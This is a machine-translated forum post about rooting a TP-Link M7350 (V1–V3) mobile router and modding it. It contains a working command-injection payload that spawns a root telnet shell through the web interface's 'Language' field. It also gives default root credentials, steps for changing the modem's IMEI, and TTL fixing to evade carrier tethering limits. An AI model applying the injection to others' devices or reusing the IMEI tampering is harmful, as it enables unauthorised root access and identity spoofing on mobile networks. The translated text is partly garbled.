Friends! Very helpful, you need a dump from V2 to restore the router.
Ready to help in this good business please contact mesb .
Micro Bloch
on digging in the gutsTP-LINK M7350HW-V1.
Fair for revisionsV1 - V3.
For revisionsv4-5 to read here Hello everyone who else may use this router. Judging by the "mad activity" in the subject we still a lot: D. Himself, if you feel honest, I have long threw it in a drawer of the table and did not pull out for several years. However, it was always a shame for this animal and no matter how negatively belonged to this manufacturer, forgive me fans and TP-Link lovers, but some devices have very much and very much. I will say right away that I really liked it in him (although it could have this instance caught me?):
Pluses M7350
- A good design, especially if you take the screen with a film;
- Not bad, for this class of devices, autonomy;
- Perfectly catches and holds the network;
- Transmitter power Wi-Fi;
- Availability of 5 GHz in Wi-Fi;
- Unegility, traveled to me the floor of the world, more than once fell with good height and is still alive.
With the preface almost finished, now to the essence (please forgive me, I got used to write so much, almost with swings and places wide;)), I recently came across one article describing the hole in the safety of this router, but I didn't reveal all the details and nuances, I took it out From stoves and began to torment.
Bloch content - that I did at the moment:
What I'm still fighting what I want and what is missing:
Already enough} -).
For full work with the router enough
Putty or
Puttytray. The phone is enough to solve the primary tasks for installing additional software, record the installation files on the USB flash drive in the router, install in the webcam in Storage Sharing mode - by Wi-Fi and work from the console. In this case, you can skip a step by changing the router composition to mode with
adb . An interesting feature of this system (has never met) is that - all the files that are recorded in any way on the SD card, they also receive rights - 777, and they are saved when copying from a flash drive to the system.
To work through
adb you will need:
adb ,
Klavkomovsky Drivers (look in the IMEI shift section), driver for
adb and of course
Total Commander with ADB plugin .
The access procedure itself is now very simple, suitable for revisions of the router
v1-v3 (except V3 with the last firmware, update to the penultimate, in the latter there are no changes in the latter in addition to closing the hole).
TOv4-v5 The method is not applicable, the structure of the device's web server has been changed..
It is assumed that you have the IP address of the router in the internal network -
192.168.0.1 1. Get access to executing commands on the router - launchtelnet:
Method -1 via HTML :
The method works out of all Operations, the main thing is the availability of a web browser. Download Archive
Tp-link-poc.html.zip.Unpacking into any place - TP-link-Poc.html and run it. Everything, the calf is.
Method - 2 through CURL
Important, CURL requests are formed under Windows for Linux, you must additionally shield characters.
1. Install the login and password to enter the web interface -
Admin: admin - As practice has shown, it is possible and not to change;
2. Unpack the attached archive to any place on the computer;
3. Run the batch file -
start-telnet.bat. ;
4. Everything;) Authorization passed the automaton (if the login and pass did not change, it did not pass, but it does not matter), the Telnet started in the beast and the web interface returned to normal.
start-telnet.zip.(279.17 KB)
Method - 3 (outdated) - through a browser, replacing post requests
1. Install (if you use another browser) Firefox or Google Chrome, I did everything on the fox, but actions are similar;
2. Reset the router to the factory settings via the web and install the standard log & pass to enter the web admin: admin (not necessarily, but preferably save the settings to the computer, then restore);
3. Enter the browser in the web muzzle
Using IP Address router and log in;
4. Go to the settings
Advanced ->Storage Sharing and in
Access Mode. select mode
By USB. (For those who are by Wi-Fi), this will then not be distracted by unnecessary open ports in the scanner;
5. Click
F12 To go to the development mode, in the panel opened, select the tab -
Network ;
6. Just below in the filter input line type -
Method: Post. ;
7. Select any request to the file
qcmap_web_cgi. - the tab of the details of this request opens, the tab must be selected in it -
headlines ;
8. Choose in it -
Change and send again ;
9. Bars appear
Request headers and
Body request - Copy in some text file from one of these windows a value
token , it will be a set of
16 characters as an example from
Request headers -
Cookie: TPWeb_Token = TXEUUQX-FJD49OB5B copy
TXEUUQX-FJD49OB5B. ;
10. Delete all the text from
Request headers and
Body request and / or bring them to mind:
Request headers:
Host: 192.168.0.1
User-Agent: Mozilla / 5.0 (Windows NT 6.1; Win64; x64; RV: 75.0) GECKO / 20100101 Firefox / 75.0
Accept: Application / JSON, Text / JavaScript, * / *; Q = 0.01.
Accept-Language: RU-EN, RU; Q = 0.8, EN-US; Q = 0.5, EN; Q = 0.3
Accept-Encoding: gzip, deflate
Content-Type: application / x-www-form-urlencoded; charset = utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 103
Origin:
http://192.168.0.1Connection: close
Referer:
http://192.168.0.1/settings.htmlCookie: TPWeb_Token =
Your value token Query body:
{"Token": "Your value token "," module ":" WebServer "," Action ": 1," Language ":" $ (busybox telnetd -l / bin / sh) "}
11. Press
To send . This we launched on ROTE
telnet But spoiled his web care, we have ceased to be displayed;
12. Now restore the setting - repeat items
7, 8 and 10 with the following data in
Request headers and
Body request :
Request headers:
Host: 192.168.0.1
User-Agent: Mozilla / 5.0 (Windows NT 6.1; Win64; x64; RV: 75.0) GECKO / 20100101 Firefox / 75.0
Accept: Application / JSON, Text / JavaScript, * / *; Q = 0.01.
Accept-Language: RU-EN, RU; Q = 0.8, EN-US; Q = 0.5, EN; Q = 0.3
Accept-Encoding: gzip, deflate
Content-Type: application / x-www-form-urlencoded; charset = utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 76
Origin:
http://192.168.0.1Connection: close
Referer:
http://192.168.0.1/settings.htmlCookie: TPWeb_Token =
Your value token Query body:
{"Token": "Your value token "," module ":" WebServer "," Action ": 1," Language ":" EN "}
13. Click
To send .
Fine. Now we have access through
telnet And access to the root file system with root rights is obtained. Check, any program scan program from a computer or phone, download the router ports, the open 23 port should appear.
2. Translation of the router in the composition withadb:
I strongly recommend not experimenting with the switching of compositions at this stage. In order to exclude possible unpleasant moments with the router, spend experiments with compositions only after installing DropBear and access to SSH. The installation description will be in the next section. 1. Run Putty:
- Host Name (OR IP Addres) - 192.168.0.1
- Connection Type - Telnet
- Port - 23.
- Open
The terminal window opens, we enter in turn
cd / ,
ls -a :
Openembedded Linux MDM9625
MSM 20150317 MDM9625.
root @ MDM9625: / # CD /
root @ MDM9625: / # Ls -a
. BIN ETC LOST + FOUND SDCARD WWW
.. boot fix_no_bdata media share
.ash_history build.prop Home Misc SYS
WebServer Cache Init MNT TMP
_Satcaldata.csv Data Lib Proc USR
BDATA_SELF.BIN DEV Linuxrc Sbin Var
root @ mdm9625: / #
Now we can watch free space in the router file system to know what to count, perform the team
df -h -a. :
root @ mdm9625: / # df -h -a
Filesystem Size Used Available Use% Mounted on
/ dev / root 37.8m 36.7m 1.0m 97% /
Proc 0 0 0 0% / Proc
sysfs 0 0 0 0% / sys
tmpfs 64.0K 64.0K 0 0% / dev
devpts 0 0 0 0% / dev / pts
TMPFS 82.1m 0 82.1m 0% / Dev / SHM
/ dev / mtdblock18 187.3m 59.8m 127.5m 32% / usr
/ dev / mtdblock1 150.8m 2.3m 148.5m 2% / Cache
/ dev / mtdblock13 10.5m 1.5m 9.0m 15% / MISC
TMPFS 82.1m 60.0k 82.0m 0% / Var / Volatile
root @ mdm9625: / #
As can be seen from the log
"/ Dev / Root 37.8m 36.7m 1.0m 97% /" With memory full ass. The root is free 1 MB, but there is another way. To install use / dev / shm.
We change the composition, enter
usb_composition As we see - from the manufacturer there is a choice of 30 different compositions. At this stage you need to choose -
902b. And three times answer questions
N-Y-Y . The selected composition will be the default composition, and immediately applies. Console came out of the log, the standard composition -
Tplink. or
902A. .
root @ mdm9625: / # usb_composition
BOOT HSUSB COMPOSITION: 9024
boot hsic composition: empty
Choose Composition by Pid:
9002 - DIAG + NMEA + MODEM (Android)
901C - DIAG + Audio [Android]
901D - Diag + ADB [Android]
9021 - DIAG + QMI_RMNET (Android)
9022 - DIAG + ADB + QMI_RMNET (Android)
9024 - RNDIS + ADB [Android]
9025 - DIAG + ADB + MODEM + NMEA + QMI_RMNET + Mass Storage (Android)
9026 - DIAG + MODEM + NMEA + QMI_RMNET + Mass Storage (Android)
902A - RNDIS + Mass Storage
902B - RNDIS + ADB + Mass Storage
902C - RNDIS + DIAG [Android]
902D - RNDIS + DIAG + ADB [Android]
902E - RNDIS + DIAG + MODEM + NMEA + QMI_RMNET + Mass Storage
9043 - DIAG + NMEA + MDM + MBIM [AMSS]
9046 - DIAG + ADB + DUN + QMI_RMNET1 + QMI_RMNET2 + QMI_RMNET3 + Mass Storage [Android]
9047 - DIAG + DUN + QMI_RMNET1 + QMI_RMNET2 + QMI_RMNET3 + Mass Storage [Android]
9049 - DIAG + ADB + DUN + RMNET + Mass Storage + QDSS [Android]
904A - DIAG + QDSS [Android]
9056 - DIAG + ADB + SERIAL + RMNET + Mass Storage + Audio [Android]
9057 - RNDIS: ECM
9059 - RNDIS + DIAG + ADB: ECM
905A - DIAG + ADB + MBIM: ECM
905B - ​​MBIM
9060 - DIAG + QDSS + ADB
9063 - RNDIS: ECM: MBIM
9064 - DIAG + ADB + MODEM + QMI_RMNET: ECM: MBIM
9067 - Mass storage + QMI_RMNET: Mass Storage + MBIM
9083 - DIAG + QDSS + RMNET
9084 - DIAG + QDSS + ADB + RMNET
9085 - DIAG + ADB + MBIM + GNSS
empty - it is used to allow either hsic or hsusb to have no composition at all (must reboot to take effect).
hsic_next -
hsusb_next -
TPLink - RNDIS + Mass Storage (User Mode)
PID Number: 902B
Choose Core: Y - HSIC, N - HSUSB? (y / n) n
Would you like it to be the defend composition? (Y / N) Y
Would You Like The Composition to Change Immediately? (Y / N) Y
At this stage
is possibleRestarting the device, waiting. A new device will appear in the Windows Device Manager for which the ADB Support driver must be installed.
I warn you right away, ADB is limited, working with it via the Windows command line is not possible, well, or I do not have it, who needs - try.
3. Installationdropbearandsftp-server:
1. Download the attached files
DropBear.tar. and
SFTP.Tar ;
2. Run Total Commander if you do not have an ADB plug-in go to the site, download, install;
3. Unpack the previously accumulated ADB on the disk, I have it in
C: \ adb \ ;
4. Run the Windows command prompt:
Start ->Search ->cmd ;
5. We perform commands (you can skip, but it happens without them):
cd / adb
adb kill-server
adb start-server
6. Through Total Commander copy files
DropBear.tar. and
SFTP.Tar to the root of the file system of the router;
7. Run
Puttytray. , choose
Connection Type - ADB , no longer changing the click of Open;
8. In the terminal window that opens, we enter
take turns:
/ # su -
root @ mdm9625: ~ #cd /
root @ mdm9625: #ls -a
root @ mdm9625: #tar -xvf dropbear.tar
root @ mdm9625: #Rm dropbear.tar
root @ mdm9625: #tar -xvf sftp.tar
root @ mdm9625: #RM SFTP.TAR
root @ mdm9625: #reboot
After rebooting, among the open ports of the router, it will appear - 22, you can connect to any console program with SSH support.
Login and password for logging in SSH standard for many Linux routers -
Root: Oelinux123 login as: root
[email protected]'s password:
root @ MDM9625: ~ # CD /
root @ mdm9625: / # Ls
WebServer Data Linuxrc SDCard
_psatcaldata.csv dev lost + found share
BDATA_SELF.BIN ETC MEDIA SYS
BIN FIX_NO_BDATA MISC TMP
Boot Home MNT USR
Build.prop Init Proc Var
Cache Lib Sbin WWW
root @ mdm9625: / #
Now you can experiment with compositions, and if you switch to a set without access to the web and ADB, you can always return to the necessary SSH.
The thing is that when choosing a song, even if you answer
n To the question of making a default, a variant of its fixation after a reboot is possible.
Sources:
dropbear ,
SFTP-server .
DropBear.tar.(400.5 KB)
SFTP.Tar(100 kb)
4. Fixationttl:
tigra815 Recalls, forgotten with me the opportunity, how to see IPTables modifiers from the Console team -
cat / proc / net / ip_tables_targets . We have the ability to modify TTL, since it is present in the list.
We watch interfaces:
root @ mdm9625: / # ifconfig
Bridge0 Link Encap: Ethernet Hwaddr 3c: 46: XX: XX: XX: XX
INET ADDR: 192.168.0.1 BCAST: 192.168.0.255 Mask: 255.255.255.0
INET6 ADDR: FE80 :: A08C: 4FFF: FE20: F37A / 64 Scope: Link
UP BROADCAST RUNNING MULTICAST MTU: 1500 Metric: 1
RX PACKETS: 83992 Errors: 0 Dropped: 7 Overruns: 0 Frame: 0
TX Packets: 84423 Errors: 0 Dropped: 0 Overruns: 0 Carrier: 0
collisions: 0 txqueuelen: 0
RX Bytes: 14058290 (13.4 MIB) TX Bytes: 60063785 (57.2 MIB)
lo Link encap: Local Loopback
inet addr: 127.0.0.1 Mask: 255.0.0.0
inet6 addr: :: 1/128 Scope: Host
UP LOOPBACK RUNNING MTU: 16436 Metric: 1
RX Packets: 1 Errors: 0 Dropped: 0 Overruns: 0 Frame: 0
TX packets: 1 errors: 0 dropped: 0 overruns: 0 carrier: 0
collisions: 0 txqueuelen: 0
RX Bytes: 76 (76.0 B) TX Bytes: 76 (76.0 B)
rmnet0 Link encap: UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
INET ADDR: 10.224.128.180 Mask: 255.255.255.0
INET6 ADDR: FE80 :: 10F6: 4E0B: 3688: 8DBD / 64 SCOPE: LINK
UP RUNNING MTU: 1500 Metric: 1
RX Packets: 54333 Errors: 0 Dropped: 0 Overruns: 0 Frame: 0
TX Packets: 47645 Errors: 0 Dropped: 0 Overruns: 0 Carrier: 0
collisions: 0 txqueuelen: 1000
RX Bytes: 47304512 (45.1 MIB) TX Bytes: 6956924 (6.6 MIB)
RNDIS0 Link Encap: Ethernet Hwaddr 3C: 46: XX: XX: XX: XX
inet addr: 169.254.3.1 Bcast: 169.254.3.255 Mask: 255.255.255.0
INET6 ADDR: FE80 :: 3E46: D8FF: Fe03: 5F1F / 64 Scope: Link
UP BROADCAST RUNNING MULTICAST MTU: 1500 Metric: 1
RX Packets: 85037 Errors: 0 Dropped: 0 Overruns: 0 Frame: 0
TX Packets: 81077 Errors: 0 Dropped: 0 Overruns: 0 Carrier: 0
collisions: 0 txqueuelen: 1000
RX Bytes: 15394255 (14.6 MIB) TX Bytes: 64751674 (61.7 MIB)
WLAN0 LINK ENCAP: Ethernet Hwaddr 3c: 46: XX: XX: XX: XX
INET ADDR: 169.254.1.1 BCast: 169.254.1.255 Mask: 255.255.255.0
INET6 ADDR: FE80 :: 3E46: D8FF: Fe03: 5F1F / 64 Scope: Link
UP BROADCAST RUNNING MULTICAST MTU: 1500 Metric: 1
RX packets: 0 errors: 0 dropped: 0 overruns: 0 frame: 0
TX packets: 85 errors: 0 dropped: 0 overruns: 0 carrier: 0
collisions: 0 txqueuelen: 1000
RX Bytes: 0 (0.0 b) TX Bytes: 2442 (2.3 KIB)
Name of external interface
rmnet0 , on it and we will fivet TTL.
A set of scripts producesStart and maintaining automation TTL commit . Used software loop. After turning on the router, the system checks the Fix TTL every minute - if it does not, it turns on, after falling asleep and subsequent initialization of the modem fixes it with a machine.
By default, the valueTTL = 128. (I have imei from the wind remote). If you need another, after installing the package, change the value ts in file / usr / share / ttlset / ttlcheck Small remark. How to advise on the forum if you took imei from Android devices or apple - fix TTL you will need to be on the value -
64 if there is something -
128 .
1. Copy through Total Commander AdB archive TTLSet.Tar to the root of the FS router;
2. In the terminal, execute the following commands:
root @ MDM9625: ~ # CD /
root @ MDM9625: # Ls -a
root @ MDM9625: # TAR -XVF TTLSET.TAR
root @ mdm9625: # rm ttlset.tar
root @ mdm9625: # reboot
Checking:
root @ MDM9625: ~ # traceroute www.ya.ru
Traceroute to www.ya.ru (87.250.250.242), 30 Hops Max, 38 Byte Packets
1 ya.ru (87.250.250.242) 71.107 MS 55.894 MS 66.848 MS
Make trace packages:
Everything,
ttl Fixed!
TtlSet.tar(5.5 KB)
5. ATcommands:
Differences options:
1. Only on the lace from the computer, using the terminal program (the desired composition, driver);
2. Through SSH, using the standard BusyBox applet -
microcom , Works through Wi-Fi. Disadvantages: Ctrl + C does not work, there is no log in commands, not all commands (for me personally), insert does not work;
3. Through SSH using -
qterminal Works through Wi-Fi, without flaws.
The 2nd and 3rd options are not dependent on the installed composition, I generally returned the router to the default composition after installing DropBear.
Option - 1 (through the terminal program)
Access to AT Commands is available in compositions containing in its composition
Modem (MDM) , when choosing such a song in the device manager appears
modems ->Qualcomm HS-USB Android Modem 902x . I advise you to use
902E . We look at the properties of the COM PORT, and use it to access AT teams. I use
Terminal From the participant of our forum WC.
rust3028 .
Option - 2 (from the SSH - MicroCom console)
You can access AT commands from the terminal by connecting SSH and after performing -
Microcom / Dev / SMD7 The advantages of this option - you do not depend on the installed router composition and you can execute the Wi-Fi commands, there is no need to physically connect via USB:
root @ MDM9625: / # microcom / dev / smd7
at
Ok
ati
Manufacturer: QUALCOMM INCORPORATED
Model: 4087.
Revision: MPSS.DI.2.0.1.C1.11-00035-M9625LAAAANAZM-1 1 [JAN 07 2015 03:00:00]
IMEI: 3597xxxxxxxxxxx
+ GCAP: + CGSM
Ok
The only small disadvantage of this method is the impossibility of completing the work
microcom By pressing Ctrl + C, you have to interrupt the SSH session (although it can only have on my Mas in Termius).
Option - 3 (from the SSH console - qterminal)
Forgotten by many program
QTerminal , Just a miracle as good for these purposes: happy: We have no libraries in the router for its work, so I had to rebel the installation archive, added the necessary libraries, the script for the launch of the program with the necessary parameters and the link on it from / usr / sbin. Big gratitude uv.
vvevvevve And his file storage.
1. Record the qterminal_m7350.tar file to / dev / shm;
2. In the console, we carry out:
root @ mdm9625: / # CD / dev / shm
ROOT @ MDM9625: / # TAR -C / -XVF qterminal_m7350.tar
root @ mdm9625: / # RM qterminal_m7350.tar
Access from the terminal by connecting the SSH and after performing
qterminal .
root @ MDM9625: ~ # qterminal
>ati
ati
Manufacturer: QUALCOMM INCORPORATED
Model: 4087.
Revision: MPSS.DI.2.0.1.C1.11-00035-M9625LAAAANAZM-1 1 [JAN 07 2015 03:00:00]
IMEI: 3597xxxxxxxxxxx
+ GCAP: + CGSM
Ok
>
qterminal_m7350.tar(314.5 KB)
Main teams:
ATI - the output of information about the router
AT & V - Current Configuration
AT + CGSN - show imei
AT + CLAC - List of supported commands
AT $ QCCLAC - Advanced list of supported commands
6. Shiftimei:
How repeatedly wrote, IMEI I changed on my router right before the laptop of the laptop with Windows, was installed
Windows 7 x64 . Now check and test me nothing, the benefit of at least the information from the encrypted disk was removed.
IMEI changed twice, with the help of different programs. The first, described below, the prog all the procedure takes a few minutes, on it and will stop in more detail, on the description of working with the second ladies, only a link, there is everything, including
Klavkomovsky Drivers .
In order to get away from the extra questions, I will immediately say -I had a full flash dump . How to merge dump I will describe at the end of the post.
Small remark. How to advise on the forum if you took imei from Android devices or apple - fix TTL you will need to be on the value -
64 if there is something -
128 .
Information - what and where !!!
IMEI is stored in 3 places on the router:
1. / MISC / IMEI
2. / etc / config / product
3. In the closed area of ​​the system.
The first IMEI file serves to generate a password to access via WiFi.I do not recommend changing because When resetting the router to factory settings, it may be generated by a password that you do not know, you can find it in the file system without problems field wpa_passphrase in file /etc/hostapd.conf. But ... I found it, I connected, time passed, I made a reset, I realized that I forgot the password, and so in a circle.
In the second, the value is taken from the first file, after resetting the router to the factory settings and servesOnly to display in the web interface . You can change, at your discretion for clarity.
In the third, we need to make changes for the operator.
To begin with, you need to install
Klavkomovsky Drivers from reference with the second program and
Change composition , I translated into -
9025 with a diagnostic port and modem, as described above in
Section 2 - Translation of the router to the composition with ADB .
First Prog - Method 1
I am writing a memory !!! I found and took from us on the forum, in the branch "
General principles of recovery loaders on Qualcomm".
1. Install -
IMEIWRITER_DIAG_EN_VER1.1.9.EXE and launch -
3G IMEI Writer. ;
2. in "
IMEI CONFIGURATION. "Must be selected -
15 Digits Mode. ;
3. in check boxes "
Write Selection. "Leave chosen
ONLY -
IMEI1 ;
4. In the lower check boxes (
AUTO SWITCH, SWITCH RESET, AUTO WRITE ) remove all checks;
5. Click "
R.READ DATA. "
6. We are waiting for the program for a long time goes ports and then reads IMEI from the device;
7. In the field with the IMEI router that appears, we enter / copy the desired, from the old smart, tablet and
etc. etc.;
8. Click "
W.Write Data. "- Waiting, the recording happens quite quickly;
9. Disconnect and reboot the router - you can check the change of IMEI by the at-command;
10. To calm the soul, change
/ etc / config / product on the new imei - serves
only To display in the webcam;
11. We change the composition to the standard -
Tplink. .
IMEIWRITER_DIAG_EN_VER1.1.9.EXE(2.35 MB)
Check
>ati
ati
Manufacturer: QUALCOMM INCORPORATED
Model: 4087.
Revision: MPSS.DI.2.0.1.C1.11-00035-M9625LAAAANAZM-1 1 [JAN 07 2015 03:00:00]
IMEI:3597xxxxxxxxxx9.
+ GCAP: + CGSM
Ok
7. Installation of additional software:
Since in the root of the FS of the free memory router less than 1 MB, installation archives through
TotalCommander ADB. Write on B.
/ Dev / shm .
Midnight commander
File Manager MC.(Midnight Commander):
1. Record the McNew.Tar file in / dev / shm;
2. In the console, we carry out:
root @ mdm9625: / # CD / dev / shm
root @ MDM9625: / # TAR -C / -XVF McNew.tar
root @ mdm9625: / # rm mcnew.tar
Run from the Console command - MC. Hide / show Midnight Commander - Ctrl + O window. Not all consoles correctly display delimiters. Read the source on the link above.
McNew.Tar(3.37 MB)
Speedtest
Console SpeedTest.1. Record the SpeedTest.Tar file in / dev / shm;
2. In the console, we carry out:
root @ mdm9625: / # CD / dev / shm
root @ MDM9625: / # TAR -C / -XVF SpeedTest.Tar
root @ MDM9625: / # RM SpeedTest.Tar
Starting from the console team - SpeedTest:
root @ MDM9625: / # Speedtest
Speedtest by Ookla
Server: OMICRON - Krasnodar (ID = 23142)
ISP: PJSC Megafon
Latency: 52.14 MS (8.15 MS Jitter)
Download: 24.01 MBPS (Data Used: 34.0 MB)
Upload: 4.60 MBPS (Data Used: 7.9 MB)
Packet Loss: 0.0%
Result URL: https://www.speedtest.net/result/c/a8632c26-dc23-4c07-a38e-c097545dd93d
Speedtest.tar(946 kb)
The problem in routers and modems is that Speedtest is trying to choose the nearest server according to the OPSSUIt does not always coincide with the current location of the user, and your geoposition is additionally used in the phone, it allows you to more accurately determine the nearest server at the moment. An acceptable solution in this case, look on the phone the name of the server used and select its ID from the list of servers, more complete and relevant here -
List of serversAnd put it in the launch of the modem:
USR / Share / Speedtest / SpeedTest --CA-CERTIFICATE = / USR / Share / Speedtest / SpeedCert.pem -S 2151
or
USR / Share / Speedtest / SpeedTest --CA-Certificate = / USR / Share / Speedtest / SpeedCert.pem --server-id = 2151
If the router is used inpatient, you can adjust this string of the start in the file -
/usr/share/speedtest/speedtest.sh. Listing the nearest, automatically specific servers, can be viewed by the team:
USR / SHARE / SPEEDTEST / SPEEDTEST --CA-CERTIFICATE = / USR / SHARE / SPEEDTEST / SPEEDCERT.PEM -L
shellinabox
The other day there was a need to enter the router console from someone else's computer. From the phone it was not convenient to work (a small screen), but to put the software on a stranger there was no possibility. Remembered the utility
shellinabox(Shell in a Box) - Allows you to work with the console of the device "from the browser". I installed it through the phone on the router, there were doubts that I would not work with us, but everything was fine. Only the prog itself is set, no additional patches and changes are needed, there are no conflicts with the system. After installation and restart, the utility "listens" port TCP: 4200. To work in the browser, we introduce:
To query Login: Password, enter the login and password from the web muzzle, for example, by default Admin: admin.
Next, go to root mode with the command:
and enter the password -
oelinux123 or
oelinux1 , I have both.
Evcheck.
I can not lean just a great program
Evcheckfrom uv. vvevvevve (however, like many other builds, software, modules).
The description from the author - "work it will be like this: After starting, the EvCheck process will remain in memory and will track the status of the WPS button. If this button is press and retain more than 3 seconds, and then release, then the script / usr / bin / script1 will start. If after This is the same again, the script / usr / bin / script2 will start. Well, and so on: scripts will start alternately, implementing the "enabled-off" logic. Such scripts can be, including OVPNUP / OVPNDOWN from Set with OpenVPN. "
The possibilities of using the program is not enough, limited only by your fantasy.
If you wish, switching can be displayed in a router's muzzle.
openVPN
There was a need to establish
openVPN , the Son asked for access to on-line libraries, the benefit of the Tun.ko module in it is compiled under the same core as we have.
Again, scripts are changed to work with our router, including I had to change the imaging scripts of the information to the muzzle of the router and coordinate them between themselves so that OpenVPN is seen or not. By default, the launch and stop of the OpenVPN is carried out by commands from the console:
However, this is not entirely convenient, of course, it is possible to stop and stop OpenVPN using snippets from the phone console, but ...
In parallel with this installed
Evcheck. The autorun script was prescribed on / off OpenVPN, now to start a VPN - a long, approximately 2 seconds, pressing the WPS button (upper button), to shut down - press again. If the information output scripts are installed in the muzzle of the router, then the symbol
" ' " Shows the activation of OpenVPN.
Installing archives by type of all other programs, see above.
To work OpenVPN, you need a configuration file, for testing you can take, for example, on the site
Whor VPN. The config is sent to email, the truth for testing they have a speed limit of 1 Mbps, but enough for tests. It is easier for me, I will raise my VPN server.
Config
is necessary Rename in -
My.OVPN. and copy to the folder on the router
/ etc / openvpn .
OpenVPN.Tar.(876.5 KB)
Evcheck_ovpn.tar.(7.5 KB)
8. Additions:
Output of information in the muzzle of the router
Installation is carried out by type and likeness of all the above programs. For work
Complete set Scripts with output signal parameters
is necessary to establish
QTerminal . It is very convenient to watch the parameters from the native TP-Link Mifi application, since the router screen is quite quickly turned off and you have to constantly poke the power button, you can also configure the screen shutdown or simply retrieving on an empty screen location in your prog and calmly observe changes. It will be useful for those who are going to use the router inpatient, to adjust it on the tower using the inner or external antennas.
3 Changes of the central inscription with a delay of 1-2 seconds, the text is changing cyclically:
-
PESP:'VK --->
Operator , colon
" : " appears if fixes are installed and fixed
ttl , apostrophe.
" ' " if installed and started
openVPN , LTE BAND -
IN 1 (3, 7, 8, 20) if compound 4G, or
3G - if 3G;
-
RSSI: XXX ;
-
rsrp ,
rsrq ,
rssnr. .
In the TP-Link Mifi application
If you and the gift you do not need output signals, set the second set of scripts -
infoshow_no_signal.tar , it contains only the conclusion -
PESP:'VK .
infoshow.tar(8 KB)
infoshow_no_signal.tar(7.5 KB)
Interesting console
Interesting and useful utilities and teams available from the console:
Qcmap_cli.
root @ MDM9625: ~ # QCMAP_CLI
Please Select An Option to Test from the Items Listed Below.
1. DISPLAY CURRENT CONFIG 38. ACTIVATE WLAN
2. DELETE SNAT ENTRY 39. SET LAN CONFIG
3. Add Snat Entry 40. Get Lan Config
4. Get Snat Config 41. Activate Lan
5. SET ROAMING 42. Get Wlan Status
6. Get Roaming 43. Enable / Disable IPv6
7. Delete DMZ IP 44. SET Firewall Config
8. Add DMZ IP 45. Get Firewall Config
9. Get DMZ IP 46. Get IPv6 State
10. Set IPsec VPN Passthrough 47. Get Wwan Profile
11. Get IPsec VPN Passthrough 48. SET WWAN PROFILE
12. Set PPTP VPN Passthrough 49. Get Upnp Status
13. Get Pptp VPN Passthrough 50. Get Dlna Status
14. SET L2TP VPN Passthrough 51. Get MDNS Status
15. Get L2TP VPN Passthrough 52. Get Station Mode Status
16. SET Autoconnect Config 53. Set Dlna Media Directory
17. Get Autoconnect Config 54. Get Dlna Media Directory
18. Get Wan Status 55. SET MOBILEAP / WLAN BOOTUP CONFIG
19. Add Firewall Entry 56. Get MobileAP / WLAN BOOTUP CONFIG
20. Enable / Disable M-DNS 57. Enable / Disable IPv4
21. Enable / Disable UPNP 58. Get IPv4 State
22. Enable / Disable DLNA 59. Get Data Bitrate
23. Display Firewalls 60. SET UPNP Notify Interval
24. Delete Firewall Entry 61. Get Upnp Notify Interval
25. Get Wwan Statistics 62. SET DLNA NOTIFY INTERVAL
26. Reset Wwan Statistics 63. Get Dlna Notify Interval
27. Get Network Configuration 64. Add DHCP Reservation Record
28. Get Nat Type 65. Get DHCP Reservation Records
29. SET NAT TYPE 66. EDIT DHCP Reservation Record
30. Enable / Disable Mobile AP 67. Delete DHCP Reservation Record
31. Enable / Disable WLAN 68. Activate Hostapd Config
32. CONNECT / DISCONNECT Backhaul 69. Activate Supplicant Config
33. Get Mobile AP Status 70. Get WebServer Wwan Access Flag
34. Set Nat Timeout 71. Set WebServer Wwan Access Flag
35. Get Nat Timeout 72. Enable / Disable RTSP ALG
36. SET WLAN CONFIG 73. RESERVED
37. Get WLAN Config 74. Teardown / Disable and Exit
Option>
Hostapd_Cli.
root @ MDM9625: ~ # Hostapd_Cli
HostAPD_CLI v2.0-Devel
Copyright (C) 2004-2012, Jouni Malinen<
[email protected].>and Contributors.
This Software May Be Distributed under the Terms of the BSD License.
See Readme for More Details.
SELECTED INTERFACE 'WLAN0'
Interactive Mode.
>help
Commands:
MIB GET MIB VARIABLES (Dot1x, Dot11, Radius)
sta<addr>Get Mib Variables for One Station
All_sta Get Mib Variables for All Stations
NEW_STA<addr>Add a New Station
Deauthenticate.<addr>Deauthenticate A Station
disassociate<addr>Disassociate A Station
wps_pin.<uuid><pin>[Timeout] [Addr] Add WPS Enrollee Pin
wps_check_pin.<PIN>Verify Pin Checksum
WPS_PBC INDICATE Button Pushed to Initiate PBC
WPS_CANCEL CANCEL THE PENDING WPS OPERATION
wps_ap_pin.<cmd>[Params ..] Enable / Disable AP PIN
wps_config<SSID><auth><Encr><key>Configure AP.
Get_Config Show Current Configuration
Help Show This Usage Help
Interface [IFNAME] show interfaces / select interface
level<DEBUG LEVEL>Change Debug Level
License Show Full Hostapd_Cli License
Vendorie.<SET / CLR.>[IE] Set or Clear Vendor IE
Update_acl<ACCEPT / DENY.><ACL File Name.>Update ACL Either to Accept / Deny from the Given File
Quit Exit Hostapd_Cli.
>
Run FTP Server
If anyone has little SFTP and SCP, you can run the FTP server on the router, it will act until reboot, you can make a script, and a link to it in / usr / sbin so as not to enter the entire command every time.
Access to the file system can be obtained from any program with FTP, including from the browser.
tcpsvd -u root: root -vE 0.0.0.0 21 ftpd -w / &
microSD
To install archives, reservations, etc. etc. You can use the flash drive installed in the router. For example, write to it the necessary installation archives and using MC (Midnight Commander) simply copy the folders you need and files on the necessary paths directly from the archive itself. All rights are saved, the links act.
How to add an unknown router opsos - correctionUnknown ISP.
We look on android phone
MCCMNC Oposos (or any known way to you), for example, the Rostelecom business -
250 20 .
To file
/etc/netispinfo.ini. add lines:
[250,20]
Ipversion = 0.
APN = internet.rtk.ru.
UserName =.
UserPass =.
Name = RTK.
Package = RTK.
Country = Russia.
After the rebut, the script earned as it should. Instead of Rostelekom, wrote RTK, since there is a limit in the number of output characters, if you add an additional info, it goes beyond the screen.
At the same time, the profile with APN immediately appeared in the webcam.
Attention:
Memory leak
Found pretty
Serious bug in the system , apparently, it can be one of (if not the main) causes of the router hangs at the start of some users, leakage and
Full memory in the root section . How remember
with memory in the root is not ice . I have, for example,
At the beginning All povers were free about 1 MB. With all his work, it began to observe its decrease, however, the volume to which it decreased in no way correlates with the volume of files created and recorded by me. At the same time, the router began to load quite a long time, the process from inclusion to a full start, connecting to the operator and WiFi activation began to take 1-2 minutes. Of course, I thought to my manipulations. However, in the search process was discovered log
